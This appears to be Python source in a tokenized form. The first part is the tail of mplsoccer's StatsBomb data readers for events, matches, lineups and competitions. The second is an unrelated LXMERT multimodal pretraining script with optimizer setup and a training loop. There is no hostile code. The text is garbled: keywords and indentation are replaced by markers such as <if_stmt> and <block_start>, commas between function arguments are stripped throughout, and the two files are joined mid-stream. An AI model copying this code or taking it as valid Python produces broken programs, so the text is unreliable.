Whether to warn about Statsbomb's data license agreement.
Returns
-------
Dict of up to 4 pandas.DataFrame.
Dict keys: ``event``, ``related_event``, ``shot_freeze_frame``, ``tactics_lineup``.
Examples
--------
>>> from mplsoccer.statsbomb import read_event
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','events','7430.json')
>>> dict_dfs = read_event(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_event, EVENT_SLUG
>>> URL = f'{EVENT_SLUG}/7430.json'
>>> dict_dfs = read_event(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end>df_dict={}<line_sep># read as dataframe
<if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df=pd.read_json(path_or_buf.content encoding='utf-8')<line_sep>match_id=int(path_or_buf.url.split('/')[-1].split('.')[0])<block_end><else_stmt><block_start>df=pd.read_json(path_or_buf encoding='utf-8')<line_sep>match_id=int(os.path.basename(path_or_buf)[:-5])<block_end><if_stmt>df.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end># timestamp defaults to today's date so store as integers in seperate columns
df['timestamp_minute']=df.timestamp.dt.minute<line_sep>df['timestamp_second']=df.timestamp.dt.second<line_sep>df['timestamp_millisecond']=(df.timestamp.dt.microsecond/1000).astype(np.int64)<line_sep>df.drop('timestamp' axis=1 inplace=<true>)<line_sep># get match id and add to the event dataframe
df['match_id']=match_id<line_sep># loop through the columns that are still dictionary columns
# and add them as separate cols to the dataframe
# these are nested dataframes in the docs - although dribbled_past/ pressure isn't needed here?
# also some others are needed: type, possession_team, play_pattern,
# team, tactics, player, position
dictionary_columns=['pass' '50_50' 'bad_behaviour' 'ball_receipt' 'ball_recovery' 'block' 'carry' 'clearance' 'dribble' 'duel' 'foul_committed' 'foul_won' 'goalkeeper' 'half_end' 'half_start' 'injury_stoppage' 'interception' 'miscontrol' 'play_pattern' 'player' 'player_off' 'position' 'possession_team' 'shot' 'substitution' 'tactics' 'team' 'type']<for_stmt>col dictionary_columns<block_start><if_stmt>col<in>df.columns<block_start>df=_split_dict_col(df col)<block_end><block_end># sort by time and reset index
df.sort_values(['minute' 'second' 'timestamp_minute' 'timestamp_second' 'timestamp_millisecond' 'possession'] inplace=<true>)<line_sep>df.reset_index(inplace=<true> drop=<true>)<line_sep># split location info to x, y and (z for shot) columns and drop old columns
_split_location_cols(df 'location' ['x' 'y' 'z'])<line_sep>_split_location_cols(df 'pass_end_location' ['pass_end_x' 'pass_end_y'])<line_sep>_split_location_cols(df 'carry_end_location' ['carry_end_x' 'carry_end_y'])<line_sep>_split_location_cols(df 'shot_end_location' ['shot_end_x' 'shot_end_y' 'shot_end_z'])<line_sep>_split_location_cols(df 'goalkeeper_end_location' ['goalkeeper_end_x' 'goalkeeper_end_y'])<line_sep># replace weird * character in the type_name for ball receipt
df['type_name']=df['type_name'].replace({'Ball Receipt*':'Ball Receipt'})<line_sep># because some columns were contained in dictionaries they have been split into separate columns
# with different prefixes, e.g. clearance_aerial_won, pass_aerial_won, shot_aerial_won
# this combines them into one column and drops the original columns
df=_simplify_cols_and_drop(df 'outcome_id')<line_sep>df=_simplify_cols_and_drop(df 'outcome_name')<line_sep>df=_simplify_cols_and_drop(df 'body_part_id')<line_sep>df=_simplify_cols_and_drop(df 'body_part_name')<line_sep>df=_simplify_cols_and_drop(df 'aerial_won')<line_sep>df=_simplify_cols_and_drop(df 'end_x' ['pass_end_x' 'carry_end_x' 'shot_end_x' 'goalkeeper_end_x'])<line_sep>df=_simplify_cols_and_drop(df 'end_y' ['pass_end_y' 'carry_end_y' 'shot_end_y' 'goalkeeper_end_y'])<line_sep>df=_simplify_cols_and_drop(df 'sub_type_id' ['pass_type_id' 'duel_type_id' 'goalkeeper_type_id' 'shot_type_id'])<line_sep>df=_simplify_cols_and_drop(df 'sub_type_name' ['pass_type_name' 'duel_type_name' 'goalkeeper_type_name' 'shot_type_name'])<line_sep># technique id/names are not always present so have to take this into account
technique_id_cols=['pass_technique_id' 'goalkeeper_technique_id' 'shot_technique_id']<line_sep>technique_id_cols=set(technique_id_cols).intersection(set(df.columns))<line_sep>technique_name_cols=['pass_technique_name' 'goalkeeper_technique_name' 'shot_technique_name']<line_sep>technique_name_cols=set(technique_name_cols).intersection(set(df.columns))<line_sep>df=_simplify_cols_and_drop(df 'technique_id' technique_id_cols)<line_sep>df=_simplify_cols_and_drop(df 'technique_name' technique_name_cols)<line_sep># create a related events dataframe
<if_stmt>related_event_df<block_start>df_related_event=_list_dictionary_to_df(df col='related_events' value_name='related_event' var_name='event_related_id')<line_sep># some carries don't have the corresponding events.
# This makes sure all events are linked both ways
df_related_event.drop('event_related_id' axis=1 inplace=<true>)<line_sep>df_related_event_reverse=df_related_event.rename({'related_event':'id' 'id':'related_event'} axis=1)<line_sep>df_related_event=pd.concat([df_related_event df_related_event_reverse] sort=<false>)<line_sep>df_related_event.drop_duplicates(inplace=<true>)<line_sep># and add on the type_names, index for easier lookups of how the events are related
df_event_type=df[['id' 'type_name' 'index']].copy()<line_sep>df_related_event=df_related_event.merge(df_event_type on='id' how='left' validate='m:1')<line_sep>df_event_type.rename({'id':'related_event'} axis=1 inplace=<true>)<line_sep>df_related_event=df_related_event.merge(df_event_type on='related_event' how='left' validate='m:1' suffixes=['' '_related'])<line_sep>df_related_event.rename({'related_event':'id_related'} axis=1 inplace=<true>)<line_sep># add on match_id and add to dictionary
df_related_event['match_id']=match_id<line_sep>df_dict['related_event']=df_related_event<block_end># create a shot freeze frame dataframe - also splits dictionary of player details into columns
<if_stmt>shot_freeze_frame_df<block_start>df_shot_freeze=_list_dictionary_to_df(df col='shot_freeze_frame' value_name='player' var_name='event_freeze_id')<line_sep>df_shot_freeze=_split_dict_col(df_shot_freeze 'player')<line_sep>_split_location_cols(df_shot_freeze 'player_location' ['x' 'y'])<line_sep># add on match_id and add to dictionary
df_shot_freeze['match_id']=match_id<line_sep>df_dict['shot_freeze_frame']=df_shot_freeze<block_end># create a tactics lineup frame dataframe
# also splits dictionary of player details into columns
<if_stmt>tactics_lineup_df<block_start>df_tactic_lineup=_list_dictionary_to_df(df col='tactics_lineup' value_name='player' var_name='event_tactics_id')<line_sep>df_tactic_lineup=_split_dict_col(df_tactic_lineup 'player')<line_sep># add on match_id and add to dictionary
df_tactic_lineup['match_id']=match_id<line_sep>df_dict['tactics_lineup']=df_tactic_lineup<block_end># drop columns stored as a separate table
df.drop(['related_events' 'shot_freeze_frame' 'tactics_lineup'] axis=1 inplace=<true>)<line_sep># there are a few errors with through ball not always being marked in the technique name
<if_stmt>'pass_through_ball'<in>df.columns<block_start>df.loc[df.pass_through_ball.notnull() 'technique_name']='Through Ball'<block_end># drop cols that are covered by other columns
# (e.g. pass technique covers through, ball, inswinging etc.)
cols_to_drop=['pass_through_ball' 'pass_outswinging' 'pass_inswinging' 'clearance_head' 'clearance_left_foot' 'clearance_right_foot' 'pass_straight' 'clearance_other' 'goalkeeper_punched_out' 'goalkeeper_shot_saved_off_target' 'shot_saved_off_target' 'goalkeeper_shot_saved_to_post' 'shot_saved_to_post' 'goalkeeper_lost_out' 'goalkeeper_lost_in_play' 'goalkeeper_success_out' 'goalkeeper_success_in_play' 'goalkeeper_saved_to_post' 'shot_kick_off' 'goalkeeper_penalty_saved_to_post']<line_sep>df.drop(cols_to_drop axis=1 errors='ignore' inplace=<true>)<line_sep># rename end location
df.rename({'shot_end_z':'end_z'} axis=1 inplace=<true>)<line_sep># reorder columns so some of the most used ones are first
cols=['match_id' 'id' 'index' 'period' 'timestamp_minute' 'timestamp_second' 'timestamp_millisecond' 'minute' 'second' 'type_id' 'type_name' 'sub_type_id' 'sub_type_name' 'outcome_id' 'outcome_name' 'play_pattern_id' 'play_pattern_name' 'possession_team_id' 'possession' 'possession_team_name' 'team_id' 'team_name' 'player_id' 'player_name' 'position_id' 'position_name' 'duration' 'x' 'y' 'z' 'end_x' 'end_y' 'end_z' 'body_part_id' 'body_part_name' 'technique_id' 'technique_name']<line_sep>other_cols=df.columns[~df.columns.isin(cols)]<line_sep>cols.extend(other_cols)<line_sep>df=df[cols].copy()<line_sep># add to dictionary
df_dict['event']=df<line_sep><return>df_dict<block_end><def_stmt>read_match path_or_buf warn=<true><block_start>""" Extracts individual match json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_match
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','matches','11','1.json')
>>> df_match = read_match(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_match, MATCH_SLUG
>>> URL = f'{MATCH_SLUG}/11/1.json'
>>> df_match = read_match(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_match=pd.read_json(path_or_buf.content convert_dates=['match_date' 'last_updated'])<block_end><else_stmt><block_start>df_match=pd.read_json(path_or_buf convert_dates=['match_date' 'last_updated'])<block_end><if_stmt>df_match.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end># loop through the columns that are still dictionary columns
# and add them as seperate cols to the datafram
dictionary_columns=['competition' 'season' 'home_team' 'away_team' 'metadata' 'competition_stage' 'stadium' 'referee']<for_stmt>col dictionary_columns<block_start><if_stmt>col<in>df_match.columns<block_start>df_match=_split_dict_col(df_match col)<block_end><block_end># convert kickoff to datetime - date + kickoff time
df_match['kick_off']=pd.to_datetime(df_match.match_date.astype(str)+' '+df_match.kick_off)<line_sep># drop one gender column as always equal to the other
# drop match status as always available
df_match.drop(['away_team_gender' 'match_status'] axis=1 inplace=<true>)<line_sep>df_match.rename({'home_team_gender':'competition_gender'} axis=1 inplace=<true>)<line_sep># manager is a list (len=1) containing a dictionary so lets split into columns
<if_stmt>'home_team_managers'<in>df_match.columns<block_start>df_match['home_team_managers']=df_match.home_team_managers.str[0]<line_sep>df_match=_split_dict_col(df_match 'home_team_managers')<line_sep>df_match['home_team_managers_dob']=pd.to_datetime(df_match['home_team_managers_dob'])<block_end><if_stmt>'away_team_managers'<in>df_match.columns<block_start>df_match['away_team_managers']=df_match.away_team_managers.str[0]<line_sep>df_match=_split_dict_col(df_match 'away_team_managers')<line_sep>df_match['away_team_managers_dob']=pd.to_datetime(df_match['away_team_managers_dob'])<block_end># ids to integers
<for_stmt>col ['competition_id' 'season_id' 'home_team_id' 'competition_stage_id']<block_start>df_match[col]=df_match[col].astype(np.int64)<block_end># sort and reset index: ready for exporting to feather
df_match.sort_values('kick_off' inplace=<true>)<line_sep>df_match.reset_index(inplace=<true> drop=<true>)<line_sep><return>df_match<block_end><def_stmt>read_competition path_or_buf warn=<true><block_start>""" Extracts competition json and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_competition
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','competitions.json')
>>> df_competition = read_competition(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_competition, COMPETITION_URL
>>> df_competition = read_competition(COMPETITION_URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_competition=pd.read_json(path_or_buf.content convert_dates=['match_updated' 'match_available'])<block_end><else_stmt><block_start>df_competition=pd.read_json(path_or_buf convert_dates=['match_updated' 'match_available'])<block_end><if_stmt>df_competition.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end>df_competition.sort_values(['competition_id' 'season_id'] inplace=<true>)<line_sep>df_competition.reset_index(drop=<true> inplace=<true>)<line_sep><return>df_competition<block_end><def_stmt>read_lineup path_or_buf warn=<true><block_start>""" Extracts individual lineup jsons and loads as a pandas.DataFrame.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
pandas.DataFrame
Examples
--------
>>> from mplsoccer.statsbomb import read_lineup
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','lineups','7430.json')
>>> df_lineup = read_lineup(PATH_TO_EDIT)
>>> from mplsoccer.statsbomb import read_lineup, LINEUP_SLUG
>>> URL = f'{LINEUP_SLUG}/7430.json'
>>> df_lineup = read_lineup(URL)
"""<if_stmt>warn<block_start>warnings.warn(STATSBOMB_WARNING)<block_end><if_stmt>type(path_or_buf).__name__<eq>'Response'<block_start>df_lineup=pd.read_json(path_or_buf.content encoding='utf-8')<line_sep>match_id=int(path_or_buf.url.split('/')[-1].split('.')[0])<block_end><else_stmt><block_start>df_lineup=pd.read_json(path_or_buf encoding='utf-8')<line_sep>match_id=os.path.basename(path_or_buf[:-5])<block_end><if_stmt>df_lineup.empty<block_start>print(f'Skipping {path_or_buf}: empty json')<line_sep><return><none><block_end>df_lineup['match_id']=match_id<line_sep># each line has a column named player that contains a list of dictionaries
# we split into seperate columns and then create a new row for each player using melt
df_lineup_players=df_lineup.lineup.apply(pd.Series)<line_sep>df_lineup=df_lineup.merge(df_lineup_players left_index=<true> right_index=<true>)<line_sep>df_lineup.drop('lineup' axis=1 inplace=<true>)<line_sep>df_lineup=df_lineup.melt(id_vars=['team_id' 'team_name' 'match_id'] value_name='player')<line_sep>df_lineup.drop('variable' axis=1 inplace=<true>)<line_sep>df_lineup=df_lineup[df_lineup.player.notnull()].copy()<line_sep>df_lineup=_split_dict_col(df_lineup 'player')<line_sep># turn ids to integers if no missings
df_lineup['match_id']=df_lineup.match_id.astype(np.int64)<line_sep>df_lineup['player_id']=df_lineup.player_id.astype(np.int64)<line_sep># sort and reset index: ready for exporting to feather
df_lineup.sort_values('player_id' inplace=<true>)<line_sep>df_lineup.reset_index(inplace=<true> drop=<true>)<line_sep><return>df_lineup<block_end><def_stmt>_get_links url# imports here as don't expect these functions to be used all the time
<block_start><import_from_stmt>bs4 BeautifulSoup<import_stmt>urllib.request<line_sep>response=urllib.request.urlopen(url)<line_sep>soup=BeautifulSoup(response 'html.parser' from_encoding=response.info().get_param('charset'))<line_sep>links=soup.find_all('a' href=<true>)<line_sep><return>links<block_end><def_stmt>get_match_links <block_start>""" Returns a list of links to the StatsBomb open-data match jsons."""<line_sep>match_url='https://github.com/statsbomb/open-data/tree/master/data/matches'<line_sep>match_folders=_get_links(match_url)<line_sep>match_folders=[(f'https://github.com/{link["href"]}' link['title'])<for>link match_folders<if>'/tree/master/data/matches'<in>link['href']]<line_sep>match_files=[]<for_stmt>link,folder match_folders<block_start>json_links=_get_links(link)<line_sep>json_links=[f'{MATCH_SLUG}/{folder}/{link["title"]}'<for>link json_links<if>link['href'][-4:]<eq>'json']<line_sep>match_files.extend(json_links)<block_end><return>match_files<block_end><def_stmt>get_event_links <block_start>""" Returns a list of links to the StatsBomb open-data event jsons."""<line_sep>url='https://github.com/statsbomb/open-data/tree/master/data/events'<line_sep>links=_get_links(url)<line_sep>links=[f'{EVENT_SLUG}/{link["title"]}'<for>link links<if>link['href'][-4:]<eq>'json']<line_sep><return>links<block_end><def_stmt>get_lineup_links <block_start>""" Returns a list of links to the StatsBomb open-data lineup jsons."""<line_sep>url='https://github.com/statsbomb/open-data/tree/master/data/lineups'<line_sep>links=_get_links(url)<line_sep>event_files=[f'{LINEUP_SLUG}/{link["title"]}'<for>link links<if>link['href'][-4:]<eq>'json']<line_sep><return>event_files<block_end> |
# coding=utf-8
# Copyleft 2019 project LXRT.
<import_stmt>collections<import_stmt>os<import_stmt>random<import_from_stmt>tqdm tqdm<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>torch.utils.data DataLoader<import_from_stmt>param args<import_from_stmt>pretrain.lxmert_data InputExample LXMERTDataset LXMERTTorchDataset LXMERTEvaluator<import_from_stmt>lxrt.entry set_visual_config<import_from_stmt>lxrt.tokenization BertTokenizer<import_from_stmt>lxrt.modeling LXRTPretraining<import_stmt>torch.distributed<as>dist<import_from_stmt>torch.utils.data.distributed DistributedSampler<import_stmt>torch.distributed<as>dist<import_from_stmt>src.tasks.vision_helpers GroupedBatchSampler create_aspect_ratio_groups_cache<import_from_stmt>lxrt.visual_transformers adjust_learning_rate<import_from_stmt>src.tools.load_stagte_dict load_state_dict_flexible_with_fp16 load_state_dict_flexible<import_stmt>gc<try_stmt><block_start><import_from_stmt>apex amp<block_end><except_stmt>ImportError<block_start><raise>ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")<block_end>DataTuple=collections.namedtuple("DataTuple" 'dataset torchdset loader evaluator')<if_stmt>args.distributed<block_start>dist.init_process_group(backend='nccl')<line_sep>torch.cuda.set_device(args.local_rank)<line_sep>args.gpus=torch.cuda.device_count()<line_sep>args.world_size=args.gpus<times>args.nodes<block_end>args.gpus=torch.cuda.device_count()<line_sep>args.gpu=args.local_rank<if>args.local_rank<ne>-1<else>0<line_sep>args.device=torch.device("cuda" args.gpu)<def_stmt>get_tuple splits:str bs:int shuffle=<false> drop_last=<false> topk=-1 distributed=<false> aspect_ratio_group_factor=-1<arrow>DataTuple# Decide which QA datasets would be used in pre-training.
# Options: vqa, gqa, visual7w
# Note: visual7w is a part of vgqa, we take the name here.
<block_start>qa_sets=args.qa_sets<if_stmt>qa_sets<is><not><none><block_start>qa_sets=set(qa_set.lower().strip()<for>qa_set qa_sets.split(","))<block_end># Build dataset, data loader, and evaluator.
dset=LXMERTDataset(splits qa_sets=qa_sets)<line_sep>tset=LXMERTTorchDataset(dset topk)<if_stmt>distributed<block_start>train_sampler=DistributedSampler(tset num_replicas=args.world_size rank=args.local_rank shuffle=shuffle )<block_end><else_stmt><block_start>train_sampler=torch.utils.data.RandomSampler(tset)<if_stmt><not>shuffle<block_start>train_sampler=torch.utils.data.SequentialSampler(tset)<block_end><block_end><if_stmt>aspect_ratio_group_factor<ge>0<block_start>group_ids=create_aspect_ratio_groups_cache(tset k=args.aspect_ratio_group_factor)<line_sep>train_batch_sampler=GroupedBatchSampler(train_sampler group_ids bs)<block_end><else_stmt><block_start>train_batch_sampler=torch.utils.data.BatchSampler(train_sampler bs drop_last=<true>)<block_end>data_loader=DataLoader(tset batch_sampler=train_batch_sampler num_workers=args.num_workers collate_fn=tset.collate_fn pin_memory=<true>)<line_sep>evaluator=LXMERTEvaluator(dset)<line_sep>print()<line_sep><return>DataTuple(dataset=dset torchdset=tset loader=data_loader evaluator=evaluator)<block_end>train_tuple=get_tuple(args.train args.batch_size shuffle=<true> drop_last=<true> distributed=args.distributed aspect_ratio_group_factor=args.aspect_ratio_group_factor)<line_sep>valid_batch_size=16<if>args.multiGPU<else>16<line_sep>valid_tuple=get_tuple(args.valid valid_batch_size shuffle=<false> drop_last=<false> topk=5000)<line_sep>LOSSES_NAME=('Mask_LM' 'Matched' 'Obj' 'Attr' 'Feat' 'QA')<def_stmt>to_gpu tensor device=<none><block_start><if_stmt>tensor<is><not><none><and>isinstance(tensor torch.Tensor)<block_start><if_stmt>device<is><not><none><block_start><return>tensor.to(device)<block_end><else_stmt><block_start><return>tensor.cuda()<block_end><block_end><return>tensor<block_end><class_stmt>LXMERT<block_start><def_stmt>__init__ self max_seq_length<block_start>super().__init__()<line_sep>self.max_seq_length=max_seq_length<line_sep>self.tokenizer=BertTokenizer.from_pretrained("bert-base-uncased" do_lower_case=<true>)<line_sep># Build model
set_visual_config(args)<line_sep>self.model=LXRTPretraining.from_pretrained("bert-base-uncased" task_mask_lm=args.task_mask_lm task_obj_predict=args.task_obj_predict task_matched=args.task_matched task_qa=args.task_qa visual_losses=args.visual_losses num_answers=train_tuple.dataset.answer_table.num_answers)<line_sep># Weight initialization and loading
<if_stmt>args.from_scratch<block_start>print("Train from Scratch: re-initialize all BERT weights.")<line_sep>self.model.apply(self.model.init_bert_weights)<block_end><if_stmt>args.load_lxmert<is><not><none># Load lxmert would not load the answer head.
<block_start>self.load_lxmert(args.load_lxmert)<block_end>#print(list(state_dict))
self.model=self.model.to(args.device)<if_stmt>args.distributed<block_start>no_decay=["bias" "LayerNorm.weight"]<line_sep>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.named_parameters()<if><not>any(nd<in>n<for>nd no_decay)] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.named_parameters()<if>any(nd<in>n<for>nd no_decay)] "weight_decay":0.0 } ]<import_from_stmt>transformers AdamW get_linear_schedule_with_warmup<if_stmt>args.use_separate_optimizer_for_visual<block_start><import_from_stmt>lxrt.visual_transformers FusedOptimizer<line_sep>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.named_parameters()<if>((<not>any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.named_parameters()<if>((any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":0.0 } ]<line_sep>optim=AdamW(optimizer_grouped_parameters lr=args.lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<line_sep>#sgd_parameters = self.model.bert.encoder.visual_model.parameters()
<if_stmt>args.use_adam_for_visual<block_start>optimizer_grouped_parameters=[{"params":[p<for>n,p self.model.bert.encoder.visual_model.named_parameters()<if>((<not>any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":args.weight_decay } {"params":[p<for>n,p self.model.bert.encoder.visual_model.named_parameters()<if>((any(nd<in>n<for>nd no_decay))<and>("visual_model"<not><in>n))] "weight_decay":0.0 } ]<line_sep>sgd=AdamW(optimizer_grouped_parameters lr=args.sgd_lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<block_end><else_stmt><block_start>sgd=torch.optim.SGD(self.model.bert.encoder.visual_model.parameters() args.sgd_lr momentum=args.sgd_momentum weight_decay=args.sgd_weight_decay)<block_end>self.optim=FusedOptimizer([optim sgd])<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<floordiv>args.gradient_accumulation_steps<line_sep>self.scheduler=get_linear_schedule_with_warmup(optim num_warmup_steps=args.warmup_ratio<times>t_total num_training_steps=t_total)<block_end><else_stmt><block_start>self.optim=AdamW(optimizer_grouped_parameters lr=args.lr #betas=(0.9, 0.98),
eps=args.adam_epsilon)<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<floordiv>args.gradient_accumulation_steps<line_sep>self.scheduler=get_linear_schedule_with_warmup(self.optim num_warmup_steps=args.warmup_ratio<times>t_total num_training_steps=t_total)<block_end><if_stmt>args.fp16<block_start><if_stmt>args.use_separate_optimizer_for_visual<block_start>self.model,[optim sgd]=amp.initialize(self.model self.optim.optimizers enabled=args.fp16 opt_level=args.fp16_opt_level)<line_sep>self.optim=FusedOptimizer([optim sgd])<block_end><else_stmt><block_start>self.model,self.optim=amp.initialize(self.model self.optim enabled=args.fp16 opt_level=args.fp16_opt_level)<block_end><import_from_stmt>apex.parallel DistributedDataParallel<as>DDP<line_sep>self.model=DDP(self.model)<block_end><else_stmt><block_start>self.model=torch.nn.parallel.DistributedDataParallel(self.model device_ids=[args.gpu] find_unused_parameters=<true>)<block_end><block_end><else_stmt># GPU Options
<block_start><if_stmt>args.multiGPU<block_start>self.model=nn.DataParallel(self.model)<block_end># Optimizer
<import_from_stmt>lxrt.optimization BertAdam<line_sep>batch_per_epoch=len(train_tuple.loader)<line_sep>t_total=int(batch_per_epoch<times>args.epochs)<line_sep>warmup_ratio=0.05<line_sep>warmup_iters=int(t_total<times>warmup_ratio)<line_sep>print("Batch per epoch: %d"%batch_per_epoch)<line_sep>print("Total Iters: %d"%t_total)<line_sep>print("Warm up Iters: %d"%warmup_iters)<line_sep>self.optim=BertAdam(self.model.parameters() lr=args.lr warmup=warmup_ratio t_total=t_total)<block_end><if_stmt>args.load<is><not><none><block_start>self.load(args.load)<line_sep>torch.cuda.empty_cache()<line_sep>gc.collect()<block_end><block_end><def_stmt>forward self examples<block_start>'''train_features = [convert_example_to_features(example, self.max_seq_length, self.tokenizer)
for example in examples]
# language Inputs
input_ids = torch.tensor([f.input_ids for f in train_features], dtype=torch.long).cuda()
input_mask = torch.tensor([f.input_mask for f in train_features], dtype=torch.long).cuda()
segment_ids = torch.tensor([f.segment_ids for f in train_features], dtype=torch.long).cuda()
# Visual Inputs
feats = torch.from_numpy(np.stack([f.visual_feats[0] for f in train_features])).cuda()
pos = torch.from_numpy(np.stack([f.visual_feats[1] for f in train_features])).cuda()
# Language Prediction
lm_labels = torch.tensor([f.lm_label_ids for f in train_features], dtype=torch.long).cuda()
# Visual Prediction
obj_labels = {}
for key in ('obj', 'attr', 'feat'):
visn_labels = torch.from_numpy(np.stack([f.obj_labels[key][0] for f in train_features])).cuda()
visn_mask = torch.from_numpy(np.stack([f.obj_labels[key][1] for f in train_features])).cuda()
assert visn_labels.size(0) == visn_mask.size(0) and visn_labels.size(1) == visn_mask.size(1)
obj_labels[key] = (visn_labels, visn_mask)
# Joint Prediction
matched_labels = torch.tensor([f.is_matched for f in train_features], dtype=torch.long).cuda()
ans = torch.from_numpy(np.stack([f.ans for f in train_features])).cuda() '''<line_sep>"""
forward(self, input_ids, token_type_ids=None, attention_mask=None, masked_lm_labels=None,
visual_feats=None, pos=None, obj_labels=None, matched_label=None, ans=None):
"""<line_sep>new_examples={}<for_stmt>key list(examples.keys())<block_start><if_stmt>key<ne>"uid"<block_start>new_examples[key]=to_gpu(examples[key])<block_end><block_end>loss,losses,ans_logit=self.model(**new_examples)<line_sep><return>loss losses.detach().cpu() ans_logit<block_end><def_stmt>valid_batch self batch<block_start><with_stmt>torch.no_grad()<block_start>loss,losses,ans_logit=self.forward(batch)<if_stmt>args.multiGPU<block_start>loss=loss.mean()<line_sep>losses=losses.mean(0)<block_end><block_end><return>loss.item() losses.cpu().numpy() ans_logit<block_end><def_stmt>train self train_tuple:DataTuple eval_tuple:DataTuple<block_start>train_ld=train_tuple.loader<line_sep># Train
best_eval_loss=9595.<for_stmt>epoch range(args.start_epoch args.epochs)# Train
<block_start>self.model.train()<line_sep>total_loss=0.<line_sep>total_losses=0.<line_sep>uid2ans={}<import_from_stmt>utils TrainingMeter<line_sep>train_meter=TrainingMeter()<if_stmt>args.use_separate_optimizer_for_visual<block_start>adjust_learning_rate(self.optim.optimizers[-1] epoch args)<block_end><for_stmt>i,batch enumerate(tqdm(train_ld total=len(train_ld)))<block_start><if_stmt>args.skip_training<and>i<eq>4<block_start><break><block_end>loss,losses,ans_logit=self.forward(batch)<if_stmt>args.multiGPU<block_start>loss=loss.mean()<block_end>losses=losses.squeeze(0)<if_stmt>args.gradient_accumulation_steps<g>1<block_start>loss=loss/args.gradient_accumulation_steps<block_end><if_stmt>args.fp16<block_start><if_stmt>args.use_separate_optimizer_for_visual<block_start><with_stmt>amp.scale_loss(loss self.optim.optimizers)<as>scaled_loss<block_start>scaled_loss.backward()<block_end><block_end><else_stmt><block_start><with_stmt>amp.scale_loss(loss self.optim)<as>scaled_loss<block_start>scaled_loss.backward()<block_end><block_end><block_end><else_stmt><block_start>loss.backward()<block_end><if_stmt>(i+1)%args.gradient_accumulation_steps<eq>0<block_start><if_stmt>args.fp16<block_start>total_norm=torch.nn.utils.clip_grad_norm_(amp.master_params(self.optim) args.max_grad_norm)<block_end><else_stmt><block_start>total_norm=torch.nn.utils.clip_grad_norm_(self.model.parameters() args.max_grad_norm)<block_end>self.optim.step()<if_stmt>args.distributed<block_start>self.scheduler.step()# Update learning rate schedule
<block_end>self.model.zero_grad()<line_sep>#self.optim.step()
<block_end>loss=loss.item()<line_sep>losses=losses.cpu().numpy()<line_sep>logit=ans_logit<line_sep>total_loss<augadd>loss<line_sep>total_losses<augadd>losses<if_stmt>args.task_qa<block_start>score,label=logit.max(1)<for_stmt>uid,l zip(batch["uid"] label.cpu().numpy())<block_start>ans=train_tuple.dataset.answer_table.id2ans(l)<line_sep>uid2ans[uid]=ans<block_end><block_end>train_meter.update({'totol_loss':loss<times>args.gradient_accumulation_steps "masked_lm":losses[0] "matched":losses[1] "qa_loss":losses[2]<if>len(losses)<eq>3<else>0.0 })<if_stmt>i<ne>0<and>i%args.report_step<eq>0<and>args.local_rank<le>0<block_start>print("Epoch {}, Training Step {} of {}".format(epoch i<floordiv>args.gradient_accumulation_steps len(train_ld)<floordiv>args.gradient_accumulation_steps))<line_sep>train_meter.report()<line_sep>train_meter.clean()<block_end><if_stmt>i<ne>0<and>args.save_step<ne>-1<and>(i<floordiv>args.gradient_accumulation_steps)%args.save_step<eq>0<and>args.local_rank<le>0<block_start>self.save("Epoch{}Step{}".format(epoch+1 i<floordiv>args.gradient_accumulation_steps))<block_end><block_end>#if args.task_qa:
# train_tuple.evaluator.evaluate(uid2ans, pprint=True)
# Save
<if_stmt>args.local_rank<le>0<block_start>self.save("Epoch%02d"%(epoch+1))<block_end># Eval
#avg_eval_loss = self.evaluate_epoch(eval_tuple, iters=-1)
